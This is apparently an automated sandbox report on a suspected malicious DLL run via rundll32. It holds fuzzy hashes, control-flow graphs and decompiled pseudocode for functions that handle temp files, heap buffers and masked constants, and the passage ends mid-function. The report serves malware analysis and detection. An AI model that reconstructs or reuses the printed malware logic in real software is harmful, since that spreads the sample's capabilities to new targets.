                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$AllocFreelstrcmpilstrlen
                  • String ID:
                  • API String ID: 727816722-0
                  • Opcode ID: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction ID: d0415e672ad6f4a9c89e0efb1880c6926a1671767ff9eca089c1e6ebc0bc87c8
                  • Opcode Fuzzy Hash: a22ed0a1ed0f0616c918df9911004096ede51290a7a9af073c19c02c22aa0494
                  • Instruction Fuzzy Hash: 7B216D36600B8896D751DB16E84039AB3A1F78CBD8F48C122FE4D83758DF38CA4ACB40
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 192 2233e2f3edc-2233e2f405d 194 2233e2f405f-2233e2f4069 192->194 195 2233e2f402a-2233e2f40ae 192->195 197 2233e2f4004-2233e2f400f 194->197 199 2233e2f40a0-2233e2f40a8 195->199 200 2233e2f40b0-2233e2f40b8 195->200 198 2233e2f3f96-2233e2f3fae call 2233e2f4d69 197->198 210 2233e2f3f27-2233e2f3f29 198->210 208 2233e2f4045-2233e2f4253 199->208 203 2233e2f4020-2233e2f409b call 2233e2f4faa 200->203 212 2233e2f4240-2233e2f424b 208->212 213 2233e2f4255-2233e2f4257 208->213 214 2233e2f3f2b-2233e2f3f31 210->214 215 2233e2f3f1a-2233e2f3f22 210->215 216 2233e2f423b-2233e2f423f 213->216 214->215 218 2233e2f3f33 214->218 215->210 217 2233e2f3fce-2233e2f3fdb 215->217 219 2233e2f3fdd-2233e2f3fea 217->219 220 2233e2f3f87-2233e2f3f94 217->220 221 2233e2f3f7a-2233e2f3f85 218->221 223 2233e2f3fc0-2233e2f3fc9 219->223 224 2233e2f3fec-2233e2f4002 219->224 220->198 222 2233e2f3f5d-2233e2f3f69 call 2233e2f4929 220->222 221->219 221->220 228 2233e2f3f6b-2233e2f3f75 call 2233e2f4929 222->228 229 2233e2f3fb3-2233e2f3fbe 222->229 223->215 224->197 224->208 228->221 232 2233e2f4114-2233e2f4121 228->232 229->228 233 2233e2f40f3-2233e2f4100 call 2233e2f5141 232->233 234 2233e2f4123-2233e2f412f 232->234 233->234 239 2233e2f4102-2233e2f410f call 2233e2f4e98 233->239 236 2233e2f4131-2233e2f4139 234->236 237 2233e2f40e6-2233e2f40f1 234->237 236->239 240 2233e2f413b-2233e2f4146 236->240 237->233 241 2233e2f40db-2233e2f40e4 237->241 239->232 243 2233e2f4164-2233e2f4175 240->243 241->237 244 2233e2f40bd-2233e2f40cc RtlAllocateHeap 241->244 243->216 244->240 247 2233e2f40ce-2233e2f40d6 244->247 247->243 248 2233e2f41d8-2233e2f41df 247->248 249 2233e2f41e1-2233e2f41ea 248->249 250 2233e2f41ec-2233e2f41f8 248->250 249->250 252 2233e2f4204-2233e2f4213 call 2233e2f4e98 249->252 253 2233e2f41fa-2233e2f4202 250->253 254 2233e2f4215-2233e2f4220 250->254 252->254 255 2233e2f4222-2233e2f422b call 2233e2f5141 252->255 253->252 256 2233e2f41cb-2233e2f41cf 253->256 254->253 254->255 255->243 256->248
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.311061219.000002233E2F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002233E2F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2233e2f0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID: R
                  • API String ID: 0-1466425173
                  • Opcode ID: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction ID: c5c8815600e55f5dfc38cdeace5fae09543f9ef2346a73c0ab16ebfd41f43a62
                  • Opcode Fuzzy Hash: f6db66518de9870f800278d0e751a791126f3dfc3022282491ac7af2e4f2bea1
                  • Instruction Fuzzy Hash: 2481693113C544AFE6A4FB98C45CB6A77E1FF94340F94479DA08AC32D1C6A99F468782
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 262 1800025ec-180002607 SleepEx 263 180002609-180002610 262->263 264 18000261b-18000261f 262->264 263->264 265 180002612-180002615 WaitForSingleObject 263->265 265->264
                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: ObjectSingleSleepWait
                  • String ID:
                  • API String ID: 309074506-0
                  • Opcode ID: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction ID: 868bbf46d8f10ff22f1b5017158e4687c10dd0102503e43f41494b1e161a0d2d
                  • Opcode Fuzzy Hash: 76b9bff6f2f2c4897aeed711b389028ad91ff366cb314fc98fdffdba1b370fa5
                  • Instruction Fuzzy Hash: 6BD05B3470360442FD9ED711985036532205F8CBD9F54C614A52B472D0CE29969E4700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.311061219.000002233E2F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002233E2F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2233e2f0000_rundll32.jbxd
                  Similarity
                  • API ID: AllocateHeap
                  • String ID:
                  • API String ID: 1279760036-0
                  • Opcode ID: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction ID: cb1bfc93f5c4741236e92ff47fbdba69a030d23d5772cc78afd4342406aef54c
                  • Opcode Fuzzy Hash: 831dfab93be32fb9158138a06fce796c917578cf2630128af9e648984fbb3730
                  • Instruction Fuzzy Hash: 71510370538644AFF7A4FBA8C05CB6D76D1FF84340F94069DA486C3291D73CAB869B82
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 314 2233e2f1c0b 315 2233e2f1d2e-2233e2f1d3b 314->315 316 2233e2f1c14-2233e2f1c19 call 2233e2f5141 314->316 318 2233e2f1d12-2233e2f1d1d 315->318 319 2233e2f1d3d-2233e2f1d4a 315->319 326 2233e2f1d78-2233e2f1d83 316->326 321 2233e2f1d02-2233e2f1d10 call 2233e2f4929 318->321 322 2233e2f1d1f-2233e2f1d2c call 2233e2f4929 318->322 323 2233e2f1d4c-2233e2f1d58 319->323 324 2233e2f1d69-2233e2f1d72 319->324 321->318 321->323 322->315 322->319 323->322 328 2233e2f1d5a-2233e2f1d64 323->328 324->326 329 2233e2f1cf3-2233e2f1d00 call 2233e2f4e98 324->329 331 2233e2f1d85-2233e2f1d91 326->331 332 2233e2f1d93-2233e2f1d9b 326->332 334 2233e2f1c7c-2233e2f1c86 328->334 329->321 340 2233e2f1ce8-2233e2f1cf1 call 2233e2f5141 329->340 331->332 338 2233e2f1d9d-2233e2f1da6 331->338 332->331 332->338 336 2233e2f1c29-2233e2f1cc6 334->336 337 2233e2f1c88-2233e2f1db4 call 2233e2f1db9 334->337 352 2233e2f1ccd-2233e2f1cd5 336->352 353 2233e2f1cc8 336->353 343 2233e2f1cda-2233e2f1cdb 338->343 340->328 345 2233e2f1cdf-2233e2f1dab 343->345 352->343 355 2233e2f1c45-2233e2f1c51 call 2233e2f3499 352->355 353->355 356 2233e2f1c62-2233e2f1c6b 353->356 359 2233e2f1c6f-2233e2f1c7a call 2233e2f5141 355->359 360 2233e2f1c53-2233e2f1c60 355->360 356->345 359->334 359->360 360->356 361 2233e2f1c97-2233e2f1ca1 360->361 363 2233e2f1c1e-2233e2f1c27 RtlAllocateHeap 361->363 364 2233e2f1ca7-2233e2f1cad 361->364 363->364 366 2233e2f1caf 364->366 367 2233e2f1cb4-2233e2f1cb9 364->367 366->316 367->337
                  Memory Dump Source
                  • Source File: 00000004.00000002.311061219.000002233E2F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002233E2F0000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_2233e2f0000_rundll32.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction ID: 5582bd1bdff9259a5b0b3947b4fc2dc55b626315708a70d71b8d7e776a7d88c8
                  • Opcode Fuzzy Hash: 4380eabb031132f8da1989044d9d06e0edfe3364dd2beaa1806a0aeff124192b
                  • Instruction Fuzzy Hash: 3B511E34538658AFF6A4FB98845C76976E1FF99300FD40799E086C32D2D6289F429B83
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$AllocTime$_snprintflstrlen$FileSleepSystemlstrcat$lstrcpy
                  • String ID:
                  • API String ID: 4119021385-0
                  • Opcode ID: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction ID: 6db0b8cd80ef826fc55d87cfc33604410ea95bd32740a9bcb331c0de9eda71bb
                  • Opcode Fuzzy Hash: e922dab22075a099e2bc3cd5af4560095cea54aa65b51856932dbb75f1f0584d
                  • Instruction Fuzzy Hash: 05919431214A4986E785DF26E8043DAB3A1F78DFC4F548121FE4A83764EE39C60EC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 406 180008d78-180008dca call 180002370 409 1800090ee 406->409 410 180008dd0-180008df3 406->410 413 1800090f3-18000910c 409->413 411 180008f65 410->411 412 180008df9-180008e1a lstrlenA HeapAlloc 410->412 414 180008f6a-180008f7f HeapFree 411->414 415 1800090e4-1800090e9 412->415 416 180008e20-180008e38 memcpy 412->416 414->413 417 180008f85-180008fa5 call 180002370 414->417 415->414 418 180008e3c-180008e3f 416->418 417->409 424 180008fab-180008fc8 call 1800038f8 417->424 420 180008e41-180008e44 418->420 421 180008e46-180008e49 418->421 420->421 423 180008e4b-180008e4e 420->423 421->418 425 180008ecc 423->425 426 180008e50-180008e79 lstrlenA HeapAlloc 423->426 433 180008fd2-180008ff5 call 180002370 424->433 434 180008fca-180008fcc 424->434 428 180008ece 425->428 426->428 429 180008e7b 426->429 431 180008ed6-180008ed8 428->431 432 180008e7e-180008e85 429->432 435 180008eda-180008f03 call 18000958c 431->435 436 180008f4f-180008f5d HeapFree 431->436 437 180008e87-180008e8a 432->437 438 180008e99 432->438 452 180008ff7-18000902d call 18000958c memcpy 433->452 453 18000905e-180009081 call 180002370 433->453 434->409 434->433 450 180008f05 435->450 451 180008f09-180008f1b LeaveCriticalSection 435->451 436->411 441 180008e95-180008e97 437->441 442 180008e8c-180008e93 437->442 443 180008e9b-180008e9e 438->443 441->438 441->443 442->437 442->441 446 180008eb5-180008ec3 443->446 447 180008ea0-180008ea3 443->447 446->432 449 180008ec5-180008eca 446->449 448 180008ea6-180008ea9 447->448 454 180008eab-180008eae 448->454 455 180008eb0-180008eb3 448->455 449->431 450->451 457 180008f1d-180008f38 HeapFree * 2 451->457 458 180008f3e-180008f4d 451->458 463 180009043-180009058 LeaveCriticalSection HeapFree 452->463 464 18000902f-18000903e memset 452->464 453->413 462 180009083-180009099 call 1800038f8 453->462 454->446 454->455 455->448 457->458 458->414 462->413 467 18000909b-1800090a4 462->467 463->453 464->463 467->413 468 1800090a6-1800090e2 call 18000958c GetSystemTimeAsFileTime LeaveCriticalSection 467->468 468->413
                  C-Code - Quality: 37%
                  			E00000001180008D78(void* __eflags, long long __rbx, intOrPtr* __rcx, long long __rdx) {
                  				void* _t77;
                  				void* _t88;
                  				intOrPtr _t91;
                  				void* _t96;
                  				char _t97;
                  				void* _t115;
                  				long long* _t157;
                  				void* _t158;
                  				long long _t160;
                  				char* _t162;
                  				long long _t163;
                  				char* _t178;
                  				char* _t179;
                  				void* _t203;
                  				long long _t204;
                  				void* _t208;
                  				intOrPtr* _t209;
                  				int _t211;
                  				void* _t215;
                  				void* _t216;
                  				void* _t235;
                  				long _t238;
                  				long _t244;
                  				void* _t246;
                  				CHAR* _t253;
                  				long long _t254;
                  
                  				_t235 = _t215;
                  				 *((long long*)(_t235 + 8)) = __rbx;
                  				 *((long long*)(_t235 + 0x10)) = __rdx;
                  				_t216 = _t215 - 0x40;
                  				r13d =  *0x8000d498;
                  				_t209 = __rcx;
                  				 *((long long*)(_t216 + 0x38)) =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				if (E00000001180002370(r13d ^ 0x55e7ce26,  *((intOrPtr*)( *0x8000d4a0 + 8)), __rdx, _t235) != 0) goto 0x800090ee;
                  				_t204 =  *((intOrPtr*)( *0x8000d4a0 + 8));
                  				_t157 =  *_t209;
                  				 *((long long*)(_t216 + 0x98)) = _t157;
                  				 *((long long*)(_t216 + 0x28)) = _t204;
                  				if ( *((intOrPtr*)(_t216 + 0x20)) == 0) goto 0x80008f65;
                  				r8d = lstrlenA(_t253) + 1;
                  				HeapAlloc(_t246, _t244, _t238);
                  				_t254 = _t157;
                  				if (_t157 == 0) goto 0x800090e4;
                  				memcpy(_t203, _t208, _t211);
                  				_t162 = _t254;
                  				if ( *_t162 == 0x20) goto 0x80008e46;
                  				if ( *_t162 != 9) goto 0x80008e4b;
                  				_t163 = _t162 + 1;
                  				goto 0x80008e3c;
                  				if ( *_t163 == 0) goto 0x80008ecc;
                  				lstrlenA(??);
                  				asm("cdq");
                  				_t12 = _t157 + 1; // 0x1
                  				r8d = _t12;
                  				HeapAlloc(??, ??, ??);
                  				if (_t157 == 0) goto 0x80008ece;
                  				_t96 =  *_t163;
                  				if (_t96 == 0) goto 0x80008e99;
                  				if (_t96 == 0x20) goto 0x80008e95;
                  				_t178 = _t163 + 1;
                  				_t97 =  *_t178;
                  				if (_t97 != 0) goto 0x80008e87;
                  				if (_t97 != 0) goto 0x80008e9b;
                  				if (_t178 == 0) goto 0x80008eb5;
                  				 *_t178 = 0;
                  				_t179 = _t178 + 1;
                  				if ( *_t179 == 0x20) goto 0x80008eb0;
                  				if ( *_t179 != 9) goto 0x80008eb5;
                  				goto 0x80008ea6;
                  				 *_t157 = _t163;
                  				_t158 = _t157 + _t204;
                  				if (_t179 + 1 != 0) goto 0x80008e7e;
                  				goto 0x80008ed6;
                  				if (0 == 0) goto 0x80008f4f;
                  				E0000000118000958C( *((intOrPtr*)(_t216 + 0x98)) + 0x18);
                  				 *((long long*)(_t209 + 0x40)) = _t254;
                  				 *((long long*)(_t209 + 0x48)) =  *((intOrPtr*)(_t216 + 0x90));
                  				 *((intOrPtr*)(_t209 + 0x50)) = bpl;
                  				if ( *((char*)(_t209 + 0x70)) == 0) goto 0x80008f09;
                  				 *((char*)(_t209 + 0x70)) = 0;
                  				asm("lock and dword [esi+0x2c], 0xfffffffe");
                  				LeaveCriticalSection(??);
                  				if ( *((intOrPtr*)(_t209 + 0x40)) == 0) goto 0x80008f3e;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80008f6a;
                  				HeapFree(??, ??, ??);
                  				HeapFree(??, ??, ??);
                  				if (0x57 != 0) goto 0x800090f3;
                  				if (E00000001180002370(r13d ^ 0x881e33f6, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090ee;
                  				_t77 = E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98);
                  				_t91 =  *((intOrPtr*)(_t216 + 0x98));
                  				if (_t77 != 0) goto 0x80008fd2;
                  				if (_t91 == 0) goto 0x800090ee;
                  				 *((intOrPtr*)(_t209 + 0x28)) = _t91;
                  				if (E00000001180002370(r13d ^ 0xa2dd2342, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x8000905e;
                  				_t39 = _t158 + 0x10; // 0x10
                  				_t88 = _t39;
                  				_t115 =  <  ?  *((void*)(_t216 + 0x90)) : _t88;
                  				E0000000118000958C( *_t209 + 0x18);
                  				r8d = _t115;
                  				memcpy(??, ??, ??);
                  				if (_t115 - _t88 >= 0) goto 0x80009043;
                  				r8d = _t88 - _t115;
                  				memset(??, ??, ??);
                  				LeaveCriticalSection(??);
                  				HeapFree(??, ??, ??);
                  				r13d = r13d ^ 0x1a1a0866;
                  				if (E00000001180002370(r13d, _t158,  *((intOrPtr*)(_t216 + 0x88)), _t235) != 0) goto 0x800090f3;
                  				if (E000000011800038F8( *((intOrPtr*)(_t216 + 0x20)),  *((intOrPtr*)(_t216 + 0x20)), _t216 + 0x98) == 0) goto 0x800090f3;
                  				if ( *((intOrPtr*)(_t216 + 0x98)) == 0) goto 0x800090f3;
                  				_t55 =  *_t209 + 0x18; // 0x28
                  				E0000000118000958C(_t55);
                  				GetSystemTimeAsFileTime(??);
                  				_t160 =  *((intOrPtr*)(_t216 + 0x30)) + ( *((intOrPtr*)( *0x8000d4a0 + 8)) +  *((intOrPtr*)( *0x8000d4a0 + 8))) * 0x23c34600;
                  				 *((long long*)(_t216 + 0x30)) = _t160;
                  				 *((long long*)(_t209 + 0x30)) = _t160;
                  				LeaveCriticalSection(??);
                  				goto 0x800090f3;
                  				goto 0x80008f6a;
                  				return 1;
                  			}





























                  0x180008d78
                  0x180008d7b
                  0x180008d7f
                  0x180008d8e
                  0x180008d99
                  0x180008daa
                  0x180008dbe
                  0x180008dca
                  0x180008ddc
                  0x180008de0
                  0x180008de3
                  0x180008deb
                  0x180008df3
                  0x180008e09
                  0x180008e0e
                  0x180008e14
                  0x180008e1a
                  0x180008e29
                  0x180008e35
                  0x180008e3f
                  0x180008e44
                  0x180008e46
                  0x180008e49
                  0x180008e4e
                  0x180008e53
                  0x180008e5c
                  0x180008e63
                  0x180008e63
                  0x180008e6b
                  0x180008e79
                  0x180008e7e
                  0x180008e85
                  0x180008e8a
                  0x180008e8c
                  0x180008e8f
                  0x180008e93
                  0x180008e97
                  0x180008e9e
                  0x180008ea0
                  0x180008ea3
                  0x180008ea9
                  0x180008eae
                  0x180008eb3
                  0x180008eb5
                  0x180008eba
                  0x180008ec3
                  0x180008eca
                  0x180008ed8
                  0x180008ee6
                  0x180008ef3
                  0x180008ef7
                  0x180008efb
                  0x180008f03
                  0x180008f05
                  0x180008f09
                  0x180008f12
                  0x180008f1b
                  0x180008f2a
                  0x180008f38
                  0x180008f4d
                  0x180008f57
                  0x180008f77
                  0x180008f7f
                  0x180008fa5
                  0x180008fba
                  0x180008fbf
                  0x180008fc8
                  0x180008fcc
                  0x180008fd5
                  0x180008ff5
                  0x180008ffa
                  0x180008ffa
                  0x18000900b
                  0x180009013
                  0x180009021
                  0x180009026
                  0x18000902d
                  0x18000903b
                  0x18000903e
                  0x180009048
                  0x180009058
                  0x18000905e
                  0x180009081
                  0x180009099
                  0x1800090a4
                  0x1800090a9
                  0x1800090ad
                  0x1800090b7
                  0x1800090cc
                  0x1800090d3
                  0x1800090d8
                  0x1800090dc
                  0x1800090e2
                  0x1800090e9
                  0x18000910c

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalLeaveSection$AllocTimelstrlenmemcpy$FileSystemmemset
                  • String ID:
                  • API String ID: 3273538229-0
                  • Opcode ID: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction ID: 6b8e83564c84abddb59c8c95e9bb71b7576c070b9c7c9cfbfdeb8062ede7394d
                  • Opcode Fuzzy Hash: fe13ca55ced21057dd33dceaeca19e1809f43a7503c78fa45138f0264a1560c7
                  • Instruction Fuzzy Hash: 65A18032204A8986EBA6DF66E4543DA7791FB8DBC4F48C015EA8D47755DF38C64EC700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 520 180001844-180001874 521 18000187a-18000187d 520->521 522 180001a6f-180001a85 520->522 521->522 523 180001883-180001893 call 180007b04 521->523 526 180001899-1800018b3 GetTempPathW 523->526 527 180001a6a 523->527 528 180001a55 526->528 529 1800018b9-1800018cf HeapAlloc 526->529 527->522 530 180001a5a-180001a68 HeapFree 528->530 529->528 531 1800018d5-1800018e3 GetTempPathW 529->531 530->522 532 1800018e5-180001914 GetSystemTimeAsFileTime GetCurrentThreadId GetTempFileNameW 531->532 533 180001916-180001924 HeapFree 531->533 532->533 534 180001927-18000192a 532->534 533->534 534->528 535 180001930-180001935 534->535 536 180001938-18000194f StrChrW 535->536 537 180001951-180001962 536->537 538 180001964-180001972 lstrlenW 536->538 539 180001976-180001979 537->539 538->539 540 1800019a7-1800019ab 539->540 541 18000197b-180001986 539->541 542 1800019b9-1800019c4 540->542 543 1800019ad-1800019b7 540->543 544 180001988-18000198c 541->544 545 18000198e-180001997 541->545 547 1800019c6-1800019e0 call 180009b7c 542->547 548 1800019ef-1800019f2 542->548 546 180001999-18000199c 543->546 544->545 544->546 545->541 545->546 546->540 549 18000199e-1800019a5 546->549 552 180001a3c-180001a53 DeleteFileW HeapFree 547->552 555 1800019e2-1800019e8 547->555 551 1800019f4-180001a0d call 180003698 548->551 548->552 549->540 549->543 551->552 558 180001a0f-180001a36 call 180005bdc HeapFree 551->558 552->530 555->551 557 1800019ea 555->557 557->536 558->552
                  C-Code - Quality: 15%
                  			E00000001180001844(long long __rbx, void* __rcx, intOrPtr* __rdx, long long _a8, int _a16, char _a24, signed int _a32) {
                  				signed long long _v72;
                  				void* __rdi;
                  				void* __rsi;
                  				void* __rbp;
                  				long _t27;
                  				int _t34;
                  				void* _t36;
                  				int _t53;
                  				int _t61;
                  				intOrPtr _t68;
                  				intOrPtr _t69;
                  				intOrPtr* _t92;
                  				signed long long _t93;
                  				intOrPtr* _t106;
                  				void* _t118;
                  				void* _t121;
                  				intOrPtr* _t122;
                  				intOrPtr* _t123;
                  				void* _t125;
                  				signed long long _t132;
                  				void* _t140;
                  				void* _t145;
                  
                  				_t94 = __rbx;
                  				_a8 = __rbx;
                  				_t92 =  *0x8000d4a0;
                  				r12d = 0;
                  				_t145 = __rcx;
                  				if (__rdx == _t140) goto 0x80001a6f;
                  				if ( *__rdx == r12b) goto 0x80001a6f;
                  				E00000001180007B04(__rbx, __rdx, _t118, _t121, _t125, __rdx);
                  				if (_t92 == _t140) goto 0x80001a6a;
                  				_t93 =  *0x8000d4a0;
                  				_t27 = GetTempPathW(??, ??);
                  				if (_t27 == r12d) goto 0x80001a55;
                  				HeapAlloc(??, ??, ??);
                  				if (_t93 == _t140) goto 0x80001a55;
                  				if (GetTempPathW(??, ??) == r12d) goto 0x80001916;
                  				GetSystemTimeAsFileTime(??);
                  				r8d = GetCurrentThreadId() ^ _a32;
                  				if (GetTempFileNameW(??, ??, ??, ??) != r12d) goto 0x80001927;
                  				_t132 = _t93;
                  				HeapFree(??, ??, ??);
                  				if (_t140 == _t140) goto 0x80001a55;
                  				_t122 = _t92;
                  				__imp__StrChrW();
                  				r8d = 0;
                  				if (_t93 == _t132) goto 0x80001964;
                  				_a16 = _t27;
                  				goto 0x80001976;
                  				_t106 = _t122;
                  				_t34 = lstrlenW(??);
                  				r8d = 0;
                  				_a16 = _t34;
                  				if (_t34 == r8d) goto 0x800019a7;
                  				_t11 = _t106 - 1; // -1
                  				_t61 = _t11;
                  				_t68 =  *((intOrPtr*)(_t122 + _t93 * 2));
                  				if (_t68 == 0x20) goto 0x8000198e;
                  				if (_t68 != 9) goto 0x80001999;
                  				_t53 = _t61;
                  				_a16 = _t61;
                  				if (_t61 != r8d) goto 0x8000197b;
                  				if (_t53 == r8d) goto 0x800019a7;
                  				_t69 =  *_t122;
                  				if (_t69 == 0x20) goto 0x800019ad;
                  				if (_t69 != 9) goto 0x800019b9;
                  				_t123 = _t122 + 2;
                  				_a16 = _t53 - 1;
                  				goto 0x80001999;
                  				 *((intOrPtr*)(_t123 + _t93 * 2)) = r8w;
                  				if ( *_t123 == r8w) goto 0x800019ef;
                  				_v72 = _t132;
                  				r9d = 0;
                  				_t36 = E00000001180009B7C(_t94, _t145, _t123, _t140, _t123,  *((intOrPtr*)(_t93 + 8)), _t140);
                  				if (_t36 != 0) goto 0x80001a3c;
                  				if (_t93 + 2 == 0) goto 0x800019f4;
                  				goto 0x80001938;
                  				if (_t36 != r8d) goto 0x80001a3c;
                  				if (E00000001180003698(_t36 - r8d, _t94, _t140,  &_a24,  *((intOrPtr*)(_t93 + 8)),  &_a16, _t93) != 0) goto 0x80001a3c;
                  				r9d = _a16;
                  				E00000001180005BDC(_t94, _t145, _t93 + 2,  *((intOrPtr*)(_t93 + 8)), _a24);
                  				HeapFree(??, ??, ??);
                  				DeleteFileW(??);
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a5a;
                  				HeapFree(??, ??, ??);
                  				goto 0x80001a6f;
                  				return 8;
                  			}

























                  0x180001844
                  0x180001844
                  0x180001858
                  0x18000185f
                  0x180001869
                  0x180001874
                  0x18000187d
                  0x180001888
                  0x180001893
                  0x180001899
                  0x1800018a8
                  0x1800018b3
                  0x1800018c3
                  0x1800018cf
                  0x1800018e3
                  0x1800018ed
                  0x180001908
                  0x180001914
                  0x180001916
                  0x18000191e
                  0x18000192a
                  0x180001935
                  0x180001940
                  0x180001946
                  0x18000194f
                  0x18000195e
                  0x180001962
                  0x180001964
                  0x180001967
                  0x18000196d
                  0x180001972
                  0x180001979
                  0x18000197b
                  0x18000197b
                  0x18000197e
                  0x180001986
                  0x18000198c
                  0x18000198e
                  0x180001990
                  0x180001997
                  0x18000199c
                  0x18000199e
                  0x1800019a5
                  0x1800019ab
                  0x1800019ad
                  0x1800019b3
                  0x1800019b7
                  0x1800019bb
                  0x1800019c4
                  0x1800019c6
                  0x1800019cb
                  0x1800019d7
                  0x1800019e0
                  0x1800019e8
                  0x1800019ea
                  0x1800019f2
                  0x180001a0d
                  0x180001a0f
                  0x180001a22
                  0x180001a36
                  0x180001a3f
                  0x180001a4d
                  0x180001a53
                  0x180001a62
                  0x180001a68
                  0x180001a85

                  APIs
                  Memory Dump Source
                  • Source File: 00000004.00000002.310854927.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000004.00000002.310845516.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310865158.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000004.00000002.310872234.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_180000000_rundll32.jbxd
                  Similarity
                  • API ID: Heap$Free$FileTemp$AllocPathTimelstrlen$CurrentDeleteNameSystemThreadmemset
                  • String ID:
                  • API String ID: 2968359827-0
                  • Opcode ID: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction ID: f42bf4f4e696ed8dde712627642a23392779c5e7d82fb71db4855592268e1331
                  • Opcode Fuzzy Hash: de161d81a4c838c80d990d95f80ea2948214c8e39259f8f0705995e773597a9e
                  • Instruction Fuzzy Hash: 1C51C931704548CAF7E6DB26A8543EA7691B78DBC1F54C015FE4687BA4EE3C8A4DC701
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 53%
                  			E00000001180005748(void* __ecx, signed int __edx, signed long long __rbx, void* __rcx, void* __rdx, void* __r8) {
                  				void* __rdi;
                  				void* __rsi;
                  				signed int _t35;
                  				void* _t69;
                  				void* _t80;
                  				char* _t113;
                  				signed long long _t116;
                  				char* _t124;
                  				void* _t142;
                  				void* _t145;
                  				char* _t147;
                  				signed long long _t150;
                  				void* _t152;
                  				void* _t153;
                  				long _t169;
                  				void* _t170;
                  				void* _t172;
                  				void* _t175;
                  
                  				_t116 = __rbx;
                  				 *((long long*)(_t152 + 8)) = __rbx;
                  				 *(_t152 + 0x18) = _t150;
                  				_t153 = _t152 - 0x40;
                  				_t113 =  *0x8000d4a0;
                  				r15d =  *0x8000d498;
                  				_t35 = r15d ^ __edx;
                  				_t146 = __r8;
                  				_t170 = __rcx;
                  				_t4 = _t150 + 1; // 0x1
                  				_t80 = _t4;
